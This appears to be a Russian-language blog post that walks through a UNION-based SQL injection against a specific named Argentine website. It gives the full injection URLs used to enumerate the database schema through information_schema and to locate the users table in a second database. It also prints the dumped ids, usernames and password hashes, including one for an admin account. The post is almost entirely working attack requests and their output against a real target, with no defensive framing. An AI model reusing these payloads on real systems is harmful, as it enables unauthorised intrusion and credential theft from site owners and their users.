http://www.planetabb.com.ar/verProducto.php?id=-435+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13+--+
Столбцов: 13
Версия: 5.0.41-log
Смотрим таблички:
http://www.planetabb.com.ar/verProducto.php?id=-435+union+select+1,2,version(),group_concat(table_name+separator+0x0a),5,6,7,8,9,10,11,12,13+from+information_schema.tables+--+
Вывод:
CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS bodas bodas_campos estado estadoventa files files_campos moneda participacionesboda participacionesboda_campos participacionesquince participacionesquince_campos quince quince_campos reg tiposervicio tipoviaje vendedores vendedores_campos ventafile ventafile_campos acos archivos aros aros_acos carteleraposts cartelerapostscomentarios groups news numeros proveedorescategorias proveedors ratings restaurantes restaurantescategorias restaurantescomentarios secciones users email_addons email_autoresponders email_banned_emails email_config_settings email_customfield_lists email_customfields email_folder_item email_folder_user email_folders email_form_customfields email_form_lists email_form_pages email_forms email_jobs email_jobs_lists email_links email_list_subscriber_bounces email
Смотрим поля таблицы users:
http://www.planetabb.com.ar/verProducto.php?id=-435+union+select+1,2,version(),group_concat(column_name+separator+0x0a),5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name='users'+--+
Вывод:
id username password group_id created modified direccion nombre apellido foto email sexo nacimiento telefono celular userid username unique_token password admintype listadmintype templateadmintype segmentadmintype status fullname emailaddress settings editownsettings usertimezone textfooter htmlfooter maxlists perhour permonth unlimitedmaxemails maxemails infotips smtpserver smtpusername smtppassword smtpport createdate lastloggedin forgotpasscode usewysiwyg enableactivitylog xmlapi xmltoken gettingstarted googlecalendarusername googlecalendarpassword user_language eventactivitytype
Делаем запрос к таблице users:
http://www.planetabb.com.ar/verProducto.php?id=-435+union+select+1,2,version(),group_concat(concat_ws(0x3a3a3a3a,id,username,password)+separator+0x0a),5,6,7,8,9,10,11,12,13+from+users+--+
Вывод:
ERRORBDTable 'ma000038_planeta.users' doesn't exist
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/planetabb/htdocs/verProducto.php on line 5
No existe el articulo
Что говорит нам о том, что таблицы users попросту не существует в БД ma000038_planeta…
Глянем ка БД в которой находится данная таблица:
http://www.planetabb.com.ar/verProducto.php?id=-435+union+select+1,2,version(),table_schema,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name='users'+--+
Вывод: boating
Это уже что то... теперь наконец то можно и вывод получить...
http://www.planetabb.com.ar/verProducto.php?id=-435+union+select+1,2,version(),group_concat(concat_ws(0x3a3a3a3a,id,username,password)+separator+0x0a),5,6,7,8,9,10,11,12,13+from+boating.users+--+
Вывод:
6::::usuario1::::929da1d3d0650105e127c2ba7cb5057b58bf654b 7::::usuario2::::929da1d3d0650105e127c2ba7cb5057b58bf654b 5::::admin::::929da1d3d0650105e127c2ba7cb5057b58bf654b
0 коммент.:
Отправить комментарий